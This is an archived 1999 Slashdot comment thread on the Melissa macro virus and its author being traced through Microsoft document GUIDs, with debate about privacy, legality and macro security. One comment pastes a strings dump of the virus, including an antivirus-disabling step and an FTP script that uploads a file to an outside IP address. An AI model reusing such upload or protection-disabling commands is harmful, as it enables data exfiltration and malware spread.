Melissa Creator tracked using MS's ID numbers? 330
So last week there was a lot of hype about Microsoft embedding
IDs into documents that would allow tracing of authors.
This week there was hype about Melissa- yet another lame
doomsday macro virus (intentionally not posted here because
I found it stupid). But mix the 2 together, and you get
a story sent to us by stevew: the Melissa Virus can
supposedly be traced
to its creator using those annoying little ids. They don't
have exact details, but the article says that it came from
AOL.
Catch a dork (Score:1)
EH
Use HTML. (Score:1)
Whenever I try to put Unix in at our company there is always a fuss thrown by middle-managers; but when something like this happens, they shrug?
Let's face it: Microsoft products are glitzy but they are not secure, not robust, and often not correct. It's time to back public protocols for business solutions and to be responsible by supporting correct and reliable standards and programs.
Here's a good conspiracy theory... (Score:1)
It was just too easy to catch up to the culprit. I don't think any self-respecting cracker would leave such obvious fingerprints.
Think about this too: This was a clever virus that used Outlook and Office to spread itself. Why didn't anyone do this before? Because only Microsoft programmers would think of such a thing!
BTW... If anyone takes this post too seriously, then they need to take more humor lessons.
Depends on what your definition of "proof" is (Score:1)
RTF not that bad. (Score:1)
At least it is ascii.
I use Applixware and have found that RTF is
the best way to exchange documents with
the 'dark side' of the company. Things sorta
go both ways without too much degradation.
Even pictures.
I'm trying to get them to send RTF when they
mail documents to other people so we don't get
those embarassing "your document has a virus"
emails.
-- cary
The Hazards of Monoclonal Agriculture (Score:1)
hard way that diversity is good, and having
a critical infrastructure based on identical
systems is bad. The Irish potato blight comes
to mind, as does health problems in race
horses and Mr Morris's worm.
Without diversity the whole infrastructure
is 'brittle' wrt new threats. With diversity
there is strength. That in itself should be
reason enough to prevent one entity's
domination of the information technology
infrastructure, be that cisco, microsoft, intel,
or even (gasp!) Linux.
This is one of my pet peeves, and everyone needs
a pet.
-- cary
There's no proof (Score:1)
smart enough to engineer this type of thing would
be smart enough to be able to cover their tracks.. */
Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
I was just wondering that... (Score:1)
Their record shows they're not above dishonestey if they think it will advance their public image. They've never done anything quite so destructive in the past if you don't count inflicting Windows on us all, but I'm afraid I find the scenario plausible. I really believe that they would do this if they thought they could get away with it.
Trust no one.
Scary as hell (Score:1)
Doesn't it scare people here what can happen to you for programming something on a computer? */
No more than the conviction of Ted Kaczynski scared me about what could happen to me for making something in my kitchen. And like Kaczynski, it's a lot more scary knowing that malicious bastards are out there.
Virus writers and crackers need to be given some serious jail time and fines. They cost the economy a great deal of money. They've been able to get away with this crap for way too long. I hope they catch the little SOB and throw the book at him.
My take on this (Score:1)
HOWEVER, this is also hardly more than circumstantial evidence. I bet it would be trivial to write a perl program to go out to j.random.word.document on the web, extract the GUID, and overwrite the GUID of a word document that you've created. If I were out to get someone (Like a competing cracker, for instance) that's exactly what I would do. The Melissa virus came out well after the news of the ID had been posted.
If I used Microsoft products, I'd prove this by writing a program to do just that. Might have to borrow a 'doze box long enough to get a few word documents to play with. That's assuming a "Swap your GUID" script isn't already on rootshell for the script kiddies' downloading pleasure.
What Law is broken? Hasn't Microsoft broken it? (Score:1)
But Microsoft has written code that (1) its purpose (and effects) are not disclosed (2) is purposely malicious to users (collecting GUID's, embedding irrelevant private hidden information in documents (I'm refering here to directory trees, other file contents etc.) (3) is widely desimenated without user knowledge (except for the "trojan" part e.g. wordprocessor, browser, etc.) (4) generates network packets that the user does not know about or initiate directly.
Microsoft's motivation for these actions were profits and power. The virus writters motivation was? Microsoft has inflicted serious costs onto individuals, businesses, etc because of such software "hidden features." So even if intent is part of the statute, Microsoft had intent. It is harder to imprison a corporation than an individual, but fines etc. are easy to impose.
;-)
GUID-A matter of Life or Death (Score:1)
KN
I fear you (Score:1)
What would you get for a speeding ticket? Your right foot chopped off?
(hey, this is beginning to sound like those middle eastern counties!)
Mitnick accepts plea bargain, then this... (Score:1)
Kevin Mitnick accepted a plea bargain... and denied the Feds a show trial. He certainly wasn't going to get a fair trial, not after being held in jail for *four years* and denied reasonable access to the evidence in order to prepare a defense.
Less than a week later Melissa is introduced... and now we learn of "proof" that the author was a known virus writer. The "proof" is that the MS GUID in the virus matches that readily available in documents posted on his web site.
In other words, the "proof" is precisely as valid
as my "proof" that I wrote Linux in 1972. After all, who can argue with the timestamp on the files?!
Do I really believe this is a deliberate attempt to frame someone for political purposes? No. Do I believe that Kevin Mitnick is totally innocent and should have never spent a day in prison? No.
But I *do* believe in history's lesson that the way we treat the Kevin Mitnick's and Larry Flynt's of the world today is how *we* will be treated tomorrow. I find it deeply disturbing that Kevin Mitnick, accused of *no* violence, was held prior to trial far longer than either Timothy McVeigh or Ted Ka^H^H^H^H the unabomer. It is signficiant that the latter two individuals faced the death penalty, while Mitnick will now be out within a year. Where is the justice in a system where an individual, even if acquitted, will spend the same amount of time in prison?!
I further believe that nothing is more dangerous to freedom than a grandstanding prosecutor. The Communist witch hunts in the 50's are a classic example, and already I can hear the questions:
Are you now, or have you ever been, a hacker?
Do you now, or have you ever, associated with known hackers?
The very real differences between "hackers" and "crackers" will matter no more than the differences between active Soviet sympathisers and the "fools" who didn't believe that 1950's America was the peak of human civilization and culture.
The bottom line, today, is that any defense lawyer who uses this as a defense is an idiot. I would not convict on this evidence alone, but neither do I find it particularly likely that it is, in fact, a setup.
The bottom line, tomorrow, is that the feds need to be careful with how they handle crackers because reasonable people *are* starting to ask questions about the way such cases are treated. The worst a cracker could do is a drop in the bucket compared to the damage caused by distrust of prosecutors. (Prime examples: AG Meese's comment that "there are, by definition, no innocent suspects" or Kenneth Starr effect on the debate over renewing the independent counsel law.)
ASCII dump of a virus-infected Word document... (Score:1)
(Note: I'm pretty clueless as to the internal workings of Word documents, but it looks like the virus writer was kind enough to comment his/her code!)
- this is a marker!
Declare Variables
Initialize Variables
Switch the VirusProtection OFF
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
' Log
file -->
' Log
file -->
C:\hsf
.sys
c:\netldx.vxd
o 209.201.88.110
user anonymous
pass itsme@
cd incoming
ascii
put
quit
command.com
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
Make sure that some conditions are true before we continue infecting anything
Tru
Infect the NormalTemplate
ed = T
alTe
veDocu
Write a log file of this NormalTemplate infection
hh:mm:ss AMPM - $
dddd, d mmm yyyy$
ode
ime, "
Infect the ActiveDocument
empl
tiveDo
mmm y
Logfile -->3) &
Blame (Score:1)
shortages in the mid 70-s, I recall people
blaming the Arabs, the oil companies, and the government.
But few blamed the car manufacturers, who had
been pushing gas-chugging monsters for more than a decade,
or themselves, for buying those cars.
Macro viruses in general (Score:1)
pheh.. (Score:2)
Scary as hell (Score:4)
This punishment does NOT fit the crime done. Basically, all this guy did was write some code (if you want to call it that). I will not deny the code was malicious, but we don't know why he did it. I could see someone trying stuff like this "just for the hell of it". Besides, if this guy hadn't done it, that security hole would have remained, and if it had been presented a year from now (presumably when even more people will be using email) it could have been MUCH worse.
Basically, they are setting the punishment based on the fact that is scared the shit out of the FBI and lots of other people, not based on the actual crime commited.
Doesn't it scare people here what can happen to you for programming something on a computer?
May I humbly suggest... (Score:2)
In the mean time, in order to get back at him, might I suggest you:
Stop contributing code.
Cancel that membership check.
Cancel that donation check.
Halt shipment of that new hardware you sent.
Stop contributing stories.
Stop making helpful suggestions.
Oh, wait, my bad, you DON'T do any of this. Ok, so that gives you... WHAT right to tell him how to run the site HE built, and HE funded, and HE works full time on?
If YOU, being God and all, feel you can do a BETTER job, then do it. Surely one with your wisdom and 377373 news posting skills can build a better slashdot than slashdot. And when you do, the masses will flock to it... right?
*If you make no effort to help, then DON'T knock a free service provided by the generosity of an (ex)student's heart!*
Jackass...
--
Uhh... (Score:1)
Uhm... "law enforcement officials" ?
----------------- ------------ ---- --- - - - -
yet another reason to not use M$ (Score:2)
Didn't the original articles on this information being in documents say something like it dated back even into the Windows 3.1 era? So, they've gotten away with it for all these years. And now we're starting to see just what these sort of companies want from us.
Starcraft was sending all kinds of information from the registry to their battle.net servers if you typed an invalid password, as well. Of course they wrap it around, "We did it to help our customers, yeah, that's it, help them." And Intel really just put the ID in the P-III as a replacement for cookies, remember web page settings, sure.
So all this is going on all these years, and people just don't care. They accept the products from giant corporations, and go with it.
With all this going on, Open Source really can take the lead in security/privacy concerns. We need to shout, "Here are our guts, program code, file formats, etc. Critique them, find holes/problems." Only with open sources can people be REALLY sure none of these scrupulous programmers include this sort of information in files.
Not _THE_ guid, just a guid (Score:1)
RTF vs PDF (Score:1)
Didn't need the GUID (Score:1)
No problem (Score:1)
I use only MacOS and Linux, have never owned a copy of Word, and to the best of my knowledge there is nothing vaguely resembling a COM object anywhere on my system, even without my taking special precautions.
Of course, in order to be able to say this I had to NOT USE MICROSOFT PROGRAMS, so obviously I'm the loony, right? It's just, well, not normal not to use Microsoft programs. Even Linux users use Microsoft programs (on the average). At least I have the consolation of this: it'll be easier for me to convince the FBI not to have me shot as owner of the GUID, because there's never been any indication that I _could_ write macro virii, due to my lack of Microsoft programs
Such a world we live in! o_O
MS Says Tracking Numbers Are Good! (Score:1)
You mean, you haven't already? :P
Mine are in RTF, plain text, and I'm thinking about trying out HTML (hate trying to get everything lined up correctly though).
Microsoft owns RTF? dammit (Score:1)
pine (Score:1)
Privacy (Score:1)
This just shows how MS programs with poor security can lead to a invasion of privacy.
We can see in this case hows its being used to track the autor of Mellisa...how long will it take so they can track down anyone else.
Microsoft, Melissa and Mr. Doe's privacy (Score:1)
As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.
On the other hand, doesnt the ease with which those GUIDs were traced suggest how easily everybodys privacy can be broken into?
I would say that with the right spin (where are those privacy groups when you need them?) this case could be a perfect demonstration of what the GUID/Privacy issue a few weeks ago was all about.
M$ blatantly mishandled their users privacy by putting GUIDs into each document that are so easy to be traced - even by outsiders, like those two guys from the ZDNet story.
So much for privacy (Score:1)
I'm all for crucifiction of digital vandals. But this is a perfect example of why I refuse to use Microsoft products for any reason.
it's a nice attempt but... (Score:1)
I find it hard to believe that anyone could trust this stupid ID tracking system MS has embedded into their programs...I also don't know about the validity of this argument that they can even track the person who has created it. It seems like an overly bloated attempt to make something of nothing simply because of the quick spread of the virus. Lastly, anyone who has been infected ought to rethink their attempt to be computer savvy because it's obviously not working.
lataz...
I am surprised it has taken so long (Score:1)
Given that so many know vb, especially so many new young programmers who are still pumped with their rebel phase, and know (and have known for a LONG time - microsft?) how easy it is to create macro virii, I am surprised we haven't seen more Melissa types ages ago. We are certainly gunna see a lot more now, as the mutations and copies already surfacing show.
I just hope the media pick up on the fact that this wouldn't (couldn't) happen if ms showed at least a modicum of respect for user level security.
Illegal search (Score:1)
Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal
My point was that the illegal search argument would be what I would use as a defense since there is no clear precedence set in this regard. Information obtained by a 3rd party without the defendants knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.
If I planted a bug in your system (via a macro virus, yaay!) that logged all keystrokes and internet traffic, would I then be allowed to prosecute you when you went to a kiddie-porn site or downloaded the latest Quake III warez? I don't think so because I, as a 3rd party, violated your private space. I would actually be PROSECUTED as such. The argument can be made (and possibly successfully) that MS violated this person's private space by recording unique information about that space and broadcasting it publicly (even if embedded in a document now made public).
Illegal search (Score:1)
Since this digital signature is hidden from the user completely, I disagree that once you release the document publicly, it's your fault the data got out.
If Outlook attached your credit card number to each outgoing mail message without your knowledge, would you then be liable for all fraudulent purchases on that card since you sent an email? No, I don't think you would be.
I don't see how someone can be held responsible for consequences of sending out data that they do not know is being sent.
No Illegal search (Score:1)
I agree completely, except that until recently, no one even KNEW they were giving up their MAC address simply by publishing a Word document. Considering how new this knowledge is, it's safe to say that many STILL do not know.
You can only voluntarily give up something you KNOW you have
How many people (beyond slashdot) even KNOW what a MAC address is and how it's created?! I would venture a guess that 65% of computer users are clueless about this aspect of networking technology.
Illegal search (Score:1)
I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedence, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?
I think there may be a fine (although gray) line between inadvertent discovery during a crime and out right pursuance of evidence during a crime. This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose to taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequent would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)
To me this is a clear distinction. The MAC address is not attached to the word doc by chance, it was programmed to do that, specifically. This "theft" of unique personal data was not inadvertent, rather is was blatant.
MS Word .DOC files follow an open spec? (Score:1)
What spec? Since word documents use a proprietary format, I don't think there is an open spec available for inspection by the public. If there IS such a document, please point me towards it. If there is NOT such a document available to the public, then I would still consider embedded MAC addresses in
The ZDNet article also goes into detail about how the GUID was matched with another GUID from a document on a website owned by a known virus author. Considering the uniqueness of the MAC addressed utilized in the GUID, it is highly unlikely, if not impossible that the two documents were not created by the same machine.
The report never mentioned anything about using the gather MAC address from Windows 98 registrations to track down this person. Where are you getting that from?
Illegal search (Score:2)
People are well aware of Caller-ID and there is a publicly available mechanism to disable this feature. I have no problems with that.
I'm not suggesting this argument to get around the crime itself, I'm suggesting it as a way to protect others from being victimized for non-criminal acts that my be unpopular.
If it stands that 3rd parties can "implant" everything you do with an ID that you do not know about or cannot turn off, free anonymous speech will disappear as we know it. That's my main concern.
hmm, very interesting. (Score:2)
If federal authorities USE this 3rd party tracking mechanism to convict, it will VALIDATE the notion that anyone, as long as they are not law enforcement, can implant people, their ideas, and their works with hidden identifiers to track them down at a later date.
In many respects, this is similar, if not identical to key escrow.
If this evidence IS used against this person, Bell Atlantic/Pac Bell may just start tapping our phone lines TOMORROW with the off chance that we will say something that can be used against us in court. It would be the same thing since it's a 3rd party, NOT law enforcement, invading our privacy to gather evidence against us.
Illegal search (Score:3)
While I am not defending this moronic macro virus creator, I do think that utilizing these GUID's is setting a BAD standard in regards to a person's right to publish anonymously.
What's next, they track down the GUID of the person who wrote an anti-Clinton
Hahahaha! (Score:1)
I can just see the day this was decided at The Collective
[Insert wavy flashback effect]
Five of Seven: "Hey, Three of Five, let's give Word the ability to run external executables!"
Three of Five: "Cool! But let's make it so that it can do this from within a macro!"
Five: "Sounds good. How about we add a startup macro that launches when the document is opened?"
Three: "Hmm, should we allow the user to turn off startup macros?"
Five: "Hahaha! What for? No one is going to use this for evil! This is a Good Thing[tm]!"
[Fade back to present]
Sad, just plain goddam sad.
Need more tracking! (Score:2)
Did M$ introduce Melissa? (Score:1)
How else are you supposed to get a shell on a system that's "secured"? (okay, I know, there are tons of ways, like Excel macros, or not-disabled Windows function keys, or changing, say, the Telnet proxy in netscape to run the command interpreter...)
I think one of my favorite oxymorons is "Windows Security". It's a good analogy, too. Want to break into a house? Break a window.
Melissa = distractionary tactic? Hmmm. (Score:1)
Eradication of Outlook Users is a Good Thing (tm) (Score:1)
Eradication of Outlook Users is a Good Thing (tm) (Score:1)
In flames (Score:1)
If you had, you'd note that it said the GUID number is in part based on the MAC address of the system's Ethernet card. Please, read the article next time. You'll be more informed, and everyone will be happier.
Need more tracking! (Score:1)
Absolutely! It is a very slippery slope, and we've already started down it. I notice that ID chip implants are already becoming common for pets. That gets the chips into mass manufacture, and gets the chip readers out there.
The next 'great beneficial use' will probably be the mentally infirm. Once it helps out there, children will be next. Don't be surprised to find out it's a lot easier to get the chip implanted in a 3 year old than it is to have it REMOVED from an 18 year old. (beyond the fact that it's harder to dig one out than to put one in).
And You're Surprised? (Score:1)
but of value (Score:1)
Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M.
Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.
Fourth, the message sent would be likely to cause problems between the sender & recipient.
I see no way in which the virus *isn't* harmful.
hawk, esq.
but of value (Score:1)
But harmful as the products may be, and even if they're more dangerous than the virus, the fundamental legal difference is permission (except for transmission of data to microsoft, which would also violate assorted laws)
hawk, esq.
knowing release *release* is the crime (Score:2)
The Common Law, and I presume most other legal systems, attribute the same intent to the natural consequences of an act as the act itself. Even without any modern "computer" crimes, the release & spread created numerous criminal trespasses against chattels (improper contact with machine), vandalism, and (the law of the individual state permitting) a general common law misdemeanor.
Larceny (theft) probably wouldn't cut it in this case, as an element is the intent to permanently deprive.
hawk, esq.
And no, this isn't legal advice.
Did M$ introduce Melissa? (Score:3)
sceptical, it's way too convinent that the
Win98 ID bug, only uncovered recently, is
suddenly going to be the life saver for solving
the Melissa problem. And all only 2 weeks
before the anti-trust trial resumes.
But, even if this is the case, I really wish
there was something that could be done against
M$ for introducing the entire concept of Word
viruses to the world; if they had introduced
the security needed into the vis basic routines
when they first put out Word 6, things wouldn't
be as rampent now.
Plus, this only goes to show that when only
one company makes all the programs that you use,
it's rather easy to find all the loopholes between
them all. (Hint, there's better, more
established ways to do interprocess communiction
that a propriatary system).
no harm (Score:1)
Guess what, GUID doesn't find Melissa author! (Score:3)
for more details.
GUID generator (Score:1)
Macro viruses in general (Score:1)
And this is different than Emacs how?
Oh, I forgot, Emacs uses Lisp.
Open Source Macro Virii (Score:1)
NO!
Vi used to execute the .exrc file in any directory, including /tmp. You would simply leave a nasty .exrc file in /tmp, wait for people to use a program such as a mail reader that forks off a copy of vi to edit a temporary file and *poof*, you have got them!
With Emacs, you can put the special tags in any file, and if the are close enough to the start of end of the file, they used to be silently executed. Just email someone with the tags at the end, and if it is the last message in the mail box, *poof* you have got them!
Ten years ago, these were the *DEFAULTS* for two of the most popular editors on UNIX. They were used in universities which had large numbers of users. UNIX was the most common OS on the Internet. It was a serious problem. The UNIX folks had to learn to set the defaults correctly, just like I hope MS (and other software companies) learns. It is just too bad they didn't learn from the past.
Open Source Macro Virii (Score:2)
VI used to read any ".exrc" file in the current directory, which could be used to create macro virii. To the best of my knowledge, this option is now turned off by default. (I don't use vi much...)
Emacs will execute code that is embedded in a file if it has the right tags around it. For example, I have this glob at the end of my .mailrc file:
About 10 years ago, emacs was changed from automatically and silently running this kind of code, to having the code displayed to the user and a y/n prompt given. Before that time, it was possible to trick Emacs's RMAIL command to propogate a virus through email.Still, I am not sure that Emacs's solution is that great. You can still turn the prompting off, and it assumes that the user knows enough about Emacs and Lisp to understand the code.
I think the real difference between OSS and MS is that OSS ran into these problems long before the Internet became aware to the general public.
Strange.... (Score:1)
Too, too funny. Nice try, Microsoft.
Macro viruses in general (Score:1)
The reality of this is that StarOffice suffers from the same problem, especially since it can run MS Office macros.
Scary as hell (Score:1)
I've had computer viruses. Monkey2 and Ripper to be specific. I remember how utterly frustrating they both were. I do think that there are things much worse however. Keep it in perspective is all I can say.
I dunno. I guess what it comes down to is that I think this says something about our misplaced & completely fucked up value system.
-Randy
Yea But... (Score:1)
Open Source Macro Virii (Score:1)
Lack of Evidence (Score:2)
Are there better tools for examining Word docs? (Score:1)
As you pointed out, while strings will give you some juicy tidbits, you can't extract the full macro contents that way (does MS tokenize their VB text?). Neither word2x nor mswordview do anything with macros. LAOLA [tu-berlin.de] includes a tool called ELSER which dumps out embedded macros, but it doesn't work with Word97 documents (which Melissa is). The mswordview [csn.ul.ie] site even linked to a DOS program called List Word Macros [wisc.edu] which I tried, and it doesn't support Word97 either.
I'd really like to see a dump of this virus, because I'm curious to see exactly what kind of insecurities a macro language would need to have in order to let the author both scan an address book and send email, without doing anything too suspicious in the UI. Does anyone have any better tools for looking at this file?
Something is fishy (Score:1)
The size of the internet says that this isn't possible. If there is any truth to the story at all it means that this guy was under some other form of surveillance and for that reason his documents were specially selected to be matched. Or it could mean that some portion of this is a sham, maybe the guy was never caught, maybe it was a propoganda ploy by either Microsoft or somebody who boosts Microsoft.
Until this story is confirmed by a somewhat credible news site I'll chalk off the capture of the perpetrator as an urban legend.
Isn't it beautiful? (Score:1)
yeah, that's a feature of word's "fast save": it uses versioning. so the old text is still there, but not displayed!!
I heard of someone who used catdoc on a job offer he got, and he was able to read the money they had offered to another person!!
and to think the corporate word relies on Word!!
Terrorism (Score:1)
Uhh... (Score:1)
Since a few virus scares back when politicians passed a specific law about writing viruses (or so I recall).
Terrorism and Physical Harm (Score:1)
Which is not to say that Melissa is a political or economic terrorist attack, though the age of electronic, entirely non-physical terrorism is coming. It makes much more sense. The future of terrorism looks more like the Sense/Net raid from Neuromancer than the World Trade Center bombing.
Why is there always AOL? (Score:2)
Though I'm still not sure what frightens me the most; "Virus" coders who leave the door open for prosecutors, M$ software that enables people to track down the author of some word document or thousand of alt.sex regulars who open a
Strange Times... the future sure should get funny
"stupid" virus? (Score:2)
No, they can be made secure and sometimes they can even be useful (especially when you use interactive documents instead of regular applications, for example in a list that checks the consistency of new entries). The problem is that it is extremely difficult to make this secure, and it looks like Microsoft is not putting much effort in making VBA programs embedded in Office documents very secure.
Netscape is quite successful at making HTML+Java/-script quite safe. They are not perfect, as the technology is evolving much too quick, but it is definately a proof-of-concept.
(The above paragraph should not leave you with the impression that using Javascript on a HTML page is a good thing - of course you should use LML and Javascript is evil).
hmm, very interesting. (Score:1)
This GUID only applies to macro viruses (for MS office programs) or for viruses compiled with an MS compiler. Anyone who wanted to eliminate identity traces could, without too much difficulty, hand craft virus code (either hand assemble, or something similar) to not only eliminate all traces of his/her identity, but also streamline the virus to be leaner and meaner.
As far as I understand the Ethernet specification, although the MAC address, upon which the GUID is based, is set in the factory, it is supposedly resetable by the user with a special utility. (In other words the ID number that is being tracked can be changed.)
So, basically, only malicious hackers who don't know what they are doing, or innocent bystanders will be tracked... also, said hacker could easily fram someone else.
Also, I don't see your justification for assuming everyone who advocates privacy is guilty. Have you ever said anything illegal on the phone? (I doubt it... almost anything you could say on the phone is protected under the 1st ammendment.) That said, would you be mad if I suggested all the phone calls you ever made were taped, and would be played before a grand jury? I know I would be livid.
Note: I used the the word "hacker" above (and not "cracker") because a "cracker" is one who cracks into other's systems. Not all malicious "hackers" are "crackers". Whether writing a virus to attack other's systems constitutes cracking, I will leave as an exercise for the reader.
Loren Osborn
That's not an HTML virus that's a VB virus (Score:2)
Good thing too. Isn't this what Darwinism is all about? Hee hee.. don't see NEARLY as many virii on Linux or MacOS (nasty exception: HK automount virus).
Anyways, back to my point... VB is the same rotten core found in Office - HTML has nothing to do with it. The "finder" of this virus tried to whip up a media scare about HTML, and FAILED...
Who cares! Its still an invasion of privacy (Score:2)
Microsoft instructs how to build Melissa (Score:4)
The Microsoft security website all but explained to this virus author how he should write his virus.
Microsoft Security Bulletin 99-002 [microsoft.com] points out the "vulnerability in Word 97 which could permit macros to run without warning the user when the user opens a document based on a template containing macros." Melissa modifies Word templates to do exactly this.
Microsoft's webpage continues with the warning "A malicious hacker could exploit this vulnerability to cause malicious macro code to be run without warning if a user opens a Word attachment that was sent by a malicious hacker..."
This security bulletin was posted to the Microsoft Knowledge Base on January 21, 1999.
Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.
Posting to an obscure security webpage hints on what might make an effective virus - a virus for which the only fix is tens of millions of separate patch downloads - is asking for trouble. Microsoft created the problem by coding a laughably insecure macro language into their applications. And they may have turned the potential problem into a real one by calling attention to it.
"Security through obscurity" is never desirable, but when the system is already as broken as the Microsoft macro language and when the user community doesn't give a damn about applying patches, it might have been a better alternative.
(Credit to TBTF [tbtf.com] for the link.)
Jamie McCarthy
hmm, very interesting. (Score:5)
So how should we feel about this? The ZDnet article only discusses the facts of the situation, which is as if should be, though there's a slight air of "this privacy-invading software feature helped catch a bad guy so it's OK" to it.
Is it good that the author's been traced? yeah, I suppose so. Doesn't matter all that much really, but I dislike viruses and their authors as much as the next person. If there's good enough proof that this is the author, and some damage can be shown, then I suppose I'm all for prosecuting.
But I care a lot less about that than about the way they caught him. It seems to me we can't just go along, and say what the ZDnet article seems, ever so slightly, to be implying: that it's all right for MS (and by extension, Intel) to build identifiers like this into their products so that anything people who use those products do is traceable, just because once it helped catch someone who was doing something illegal. That's like saying "sure, the FBI can go ahead and install a wiretap on everyone's phone--fine by me, I'm not doing anything illegal, and only people who are would have to worry about that." I don't think anyone in their right mind would agree to something like that; and it violates all the principles on which our legal system is founded: "presumed innocent until proven guilty."
It's good that they caught the author of the virus, if that were all that this meant. But it's not. I hope they don't try to prosecute unless they obtain stronger evidence, through more valid means; and if they do prosecute, I hope they don't try to use the Office-ID-number-trace in court. If they do, we're all going to have to start worrying. And looking over our shoulders.
Isn't it beautiful? (Score:2)
stupid enough to write on WordBasic for self-expression (and what other purpose such viruses have), doesn't probably know enough
of hex editors to falsificate GUID.
And why care about some ID number while you
are willingfully sending out big chunks of
arbitrary information from your computer with
word file (which can contain your dialup password,
private mail and even secring.pgp), waiting
only for someone with LAOLA to investigate it.
I have recieved reports from catdoc users, that
they was able to read future plans of their bosses, which wasn't intended to be sent just now.
Imagine surprise of boss when emploee begin to
discuss with him plans, which weren't even send
(in boss opinion)
Why the MSID is a _bad_ law enforcement idea (Score:3)
First off, well said, Mr. Madin.
This piece clearly implies that the MSID is a powerful law enforcement tool on the Digital Frontier. (BTW, I thought the out-of-nowhere references to the FBI were a nice touch.) That idea doesn't hold water, for a number of reasons. Apparently, ZD will gratuitously reinforce their message with questionable stuff like that FBI reference, but won't do the homework necessary to refute arguments that logically arise from their implied assertion.
If they can be refuted, I don't think they can.
First, there's no reason this will ever trap another hacker again, malicious or not. None. Anyone smart enough to write a Word97 macro is smart enough to obtain their own MAC address, scan the file for it, and remove it.
Is the address encrypted? The article doesn't say, which leads me to believe that it's not. Even if they do end up encrypting the thing, how hard will it be to decrypt? The only people you'll track down with this will be script kiddies killing time. Hackers knowledgeable enough to do genuine damage to a defended infrastructure are knowledgeable enough to find this ID and neutralize it.
"But that doesn't apply to the Intel ID," I can hear the ZD sycophants opine, "the Intel ID is a hardware ID, and no hacker can erase that!"
Fair enough. And the MAC address isn't?
In order for this ID to be useful in tracking down the origin of a virus, it has to be propagated in a file. Any file can be searched and have its contents modified. Period. The kind of ID you have makes no difference after it's overwritten.
So this ID will only end up in documents that are:
So the only people the ID can track are law-abiding citizens who don't care to remove the ID because their intentions are not malicious. Now why would you want to track them?
The answer is left as an exercise to the reader.
phil
Eradication of Outlook Users is a Good Thing (tm) (Score:2)
Only Microsoft could have taken a task as simple (by design!) as reading e-mail and evolve it into a beast that takes at least 8 MB of memory when running. Strangely enough, even Microsoft's own Outlook Express tool is far lighter and friendlier, without making you feel like you're firing up Word just to read an email.
"Less is More" evidently isn't a design addage that is used much at Microsoft.
Microsoft, Melissa and Mr. Doe's privacy (Score:2)
While the evolution of Office macro language to VBA may be seem as a good thing, allowing the same code to unify all Office apps and use all features in a wholesome manner, the combined effect of VBA and the "webfication" of Office brings forth security issues far beyond a Melissa.
Think about Melissa virus as a test and about its creator as script kid. The next virus will not be so harmless(the documented effect of Melissa is the slashdotting of some mail servers and a few hard undeserved words being screamed in corporations corridors) nor will its author be so reckless.
Naturally I am assuming above that the GUID found points to right machine. Wouldn't it be funny if it doesn't? Remember, the number points to a machine. And it can easily be faked (there is even a specific C++ function in the COM API to generate GUIDs. It works in the absence of network cards).
As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.
GUID didn't solve Melissa problem. (Score:4)
While I am probably being paranoid and overly sceptical, it's way too convinent that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem.
The M$ GUID will not solve the Melissa virus from spreading. That will go on as long as one person has not taken the proper precautions.
All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).
Actually, the GUID creates more problems. If you want to help solve crimes in a similar manner, it would be beneficial to have wire taps and other eavesdropping devices in everyone's home. That way, if anyone in the United States mentions terrorism, they can be promptly arrested for plotting terrorist acts.
All the GUID is is Big Bro looking over your shoulder. That's not a comfortable feeling for me.
This latest development will certainly put privacy issues in regards to electronic forums to the forefront again.
~afniv
"Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"
...unless, of course, you're using Windows. (Score:4)
Of course, you're only vulnerable if you're running Windows. So, it's an HTML-borne virus that makes use of a Windows security hole. Doesn't matter if you have armor plated walls if the foundation is rotten.
Yeah right. (Score:3)
lets expose a major security hole in one of our products,
to let everyone see that GUID is a good thing.
hell, they made security holes in purpose to make GUID useful.
They planned it all along, ofcourse,
they knew GUID would be exposed, so made it possible for them to say:
"You need GUID because our products are bad and have many exploits for crackers to play with"
it reminds me when Microsoft bragged that NT servers had failsafe modes,
and when a server crashes,
another server can replace it.
If NT servers didnt crash so often nobody would care.
---
Yet again, common sense is nowhere to be found... (Score:2)
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... why motivates M$ to deliberately ignore them?
It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.
Conspiracy theories, my ass. More than enough evidence to go on here.
Macro viruses in general (Score:3)
The really sad thing is you can't sue them. They create an obviously deficient product, one which they could easily have changed to prevent material harm to their customers, yet they are not liable. But let somebody pour coffee all over their genitals, and Ronald McDonald is paying to the tune of $n*1E6.
Microsoft instructs how to build Melissa (Score:2)
What's really laughable is this patch. It simply changes Word so that when you open a document with a macro, Word says "This document contains macros. Would you like to disable them?" It gives no clue what effect these macros may have. This is a fix?
Mike
--
MS Says Tracking Numbers Are Good! (Score:3)
